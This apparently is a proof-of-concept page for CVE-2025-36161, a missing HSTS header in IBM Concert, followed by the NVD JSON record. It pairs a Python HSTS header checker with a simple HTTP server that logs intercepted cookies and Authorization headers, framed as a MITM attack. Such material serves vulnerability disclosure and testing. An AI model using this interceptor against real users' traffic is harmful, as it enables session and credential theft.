CVE-2025-36161

# CVE-2025-36161 PoC - HSTS Bypass via MITM # This PoC demonstrates the HSTS bypass vulnerability in IBM Concert import http.server import socketserver import ssl import threading from urllib.parse import urlparse class HSTSInterceptor(http.server.SimpleHTTPRequestHandler): """ Simulates an attacker performing MITM attack due to missing HSTS header. This PoC demonstrates how sensitive data can be intercepted when HSTS is not properly configured on IBM Concert servers. """ def do_GET(self): # Parse the requested URL parsed_path = urlparse(self.path) # Log intercepted request print(f"[ATTACK] Intercepted request: {self.path}") print(f"[ATTACK] Source IP: {self.client_address[0]}") print(f"[ATTACK] Headers: {self.headers}") # Check for sensitive data in headers if 'Cookie' in self.headers: cookies = self.headers['Cookie'] print(f"[CRITICAL] Cookie data intercepted: {cookies}") # In real attack, attacker would exfiltrate this data if 'Authorization' in self.headers: auth = self.headers['Authorization'] print(f"[CRITICAL] Authorization header intercepted: {auth}") # Send response (in real attack, could inject malicious content) self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() response = """ <html> <body> <h1>MITM Attack Successful</h1> <p>No HSTS header detected. Traffic can be intercepted.</p> </body> </html> """ self.wfile.write(response.encode()) def log_message(self, format, *args): # Suppress default logging pass def check_hsts_header(url): """ Check if a URL properly implements HSTS header. Returns True if HSTS is properly configured, False otherwise. """ import urllib.request try: # Ensure we're checking HTTPS if not url.startswith('https'): url = url.replace('http', 'https', 1) req = urllib.request.Request(url) with urllib.request.urlopen(req, timeout=10) as response: strict_transport_security = response.headers.get('Strict-Transport-Security') if strict_transport_security: print(f"[✓] HSTS header found: {strict_transport_security}") return True else: print("[✗] HSTS header NOT found - vulnerable to MITM attack") return False except Exception as e: print(f"[ERROR] Failed to check HSTS: {e}") return False def start_mitm_proxy(port=8080): """ Start a MITM proxy server to intercept traffic. In production, this would be used by an attacker. """ with socketserver.TCPServer(("", port), HSTSInterceptor) as httpd: print(f"[ATTACK] MITM proxy listening on port {port}") httpd.serve_forever() if __name__ == "__main__": # Check if IBM Concert server has HSTS configured target_url = "https://ibm-concert.example.com" print(f"[*] Checking HSTS configuration for: {target_url}") print("-" * 50) has_hsts = check_hsts_header(target_url) if not has_hsts: print("\n[!] VULNERABLE: Server does not implement HSTS") print("[!] Attackers can perform MITM to intercept sensitive data") print("[!] Recommendation: Enable HSTS header on server") else: print("\n[✓] Server properly implements HSTS protection")

{"cve": {"id": "CVE-2025-36161", "sourceIdentifier": "[email protected]", "published": "2025-11-20T16:15:58.330", "lastModified": "2025-11-24T14:47:51.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict-Transport-Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.1.0", "matchCriteriaId": "43072AC2-05A5-41A3-9E79-E0AF2C5AD3FF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252019", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}